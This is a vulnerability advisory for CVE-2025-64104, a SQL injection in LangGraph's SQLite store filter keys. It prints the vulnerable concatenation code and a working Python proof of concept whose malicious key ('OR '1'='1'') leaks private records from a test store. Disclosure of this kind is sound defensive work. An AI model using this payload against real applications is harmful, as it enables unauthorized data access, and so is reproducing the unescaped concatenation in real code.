CVE-2025-64104

Summary

LangGraph's SQLite store implementation contains SQL injection vulnerabilities using direct string concatenation without proper parameterization, allowing attackers to inject arbitrary SQL and bypass access controls.

Details

/langgraph/libs/checkpoint-sqlite/langgraph/store/sqlite/base.py

The key portion of the JSON path is concatenated directly into the SQL string without sanitation. There's a few different occurrences within the file.

  filter_conditions.append(
      &quot;json_extract(value, &#039;$.&quot;
      + key  # &lt;-- Directly concatenated, no escaping!
      + &quot;&#039;) = &#039;&quot;
      + value.replace(&quot;&#039;&quot;, &quot;&#039;&#039;&quot;)  # &lt;-- Only value is escaped
      + &quot;&#039;&quot;
  )

Who is affected

This issue affects only developers or projects that directly use the checkpoint-sqlite store.

An application is vulnerable only if it:

Instantiates the SqliteStore from the checkpoint-sqlite package, and
Builds the filter argument using keys derived from untrusted or user-supplied input (such as query parameters, request bodies, or other external data).

If filter keys are static or validated/allowlisted before being passed to the store, the risk does not apply.

Note: users of LangSmith deployments (previously known as LangGraph Platform) are not affected as those deployments rely on a different checkpointer implementation.

PoC

Complete instructions, including specific configuration details, to reproduce the vulnerability.

#!/usr/bin/env python3
&quot;&quot;&quot;Minimal SQLite Key Injection POC for LangGraph&quot;&quot;&quot;

from langgraph.store.sqlite import SqliteStore

# Create store with test data
with SqliteStore.from_conn_string(&quot;:memory:&quot;) as store:
    store.setup()
    
    # Add public and private documents
    store.put((&quot;docs&quot;,), &quot;public&quot;, {&quot;access&quot;: &quot;public&quot;, &quot;data&quot;: &quot;public info&quot;})
    store.put((&quot;docs&quot;,), &quot;private&quot;, {&quot;access&quot;: &quot;private&quot;, &quot;data&quot;: &quot;secret&quot;, &quot;password&quot;: &quot;123&quot;})
    
    # Normal query - returns 1 public document
    normal = store.search((&quot;docs&quot;,), filter={&quot;access&quot;: &quot;public&quot;})
    print(f&quot;Normal query: {len(normal)} docs&quot;)
    
    # SQL injection via malicious key
    malicious_key = &quot;access&#039;) = &#039;public&#039; OR &#039;1&#039;=&#039;1&#039; OR json_extract(value, &#039;$.&quot;
    injected = store.search((&quot;docs&quot;,), filter={malicious_key: &quot;dummy&quot;})
    
    print(f&quot;Injected query: {len(injected)} docs&quot;)
    for doc in injected:
        if doc.value.get(&quot;access&quot;) == &quot;private&quot;:
            print(f&quot;LEAKED: {doc.value}&quot;)

Published: Oct 29, 2025
Updated: Oct 30, 2025
CVE: CVE-2025-64104
GHSA: GHSA-7p73-8jqx-23r8
Severity: High
Exploit:

CVSS v3:

Severity: Unknown
Score:
AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N

CWEs:

CWE-89

OWASP TOP 10:

A1 - Injection

Affected Software
References

Software	From	Fixed in
langgraph-checkpoint-sqlite	-	2.0.11

Vulnerability Database

CVE-2025-64104

Summary

Details

Who is affected

PoC

Deep Security Visibility Without the Complexity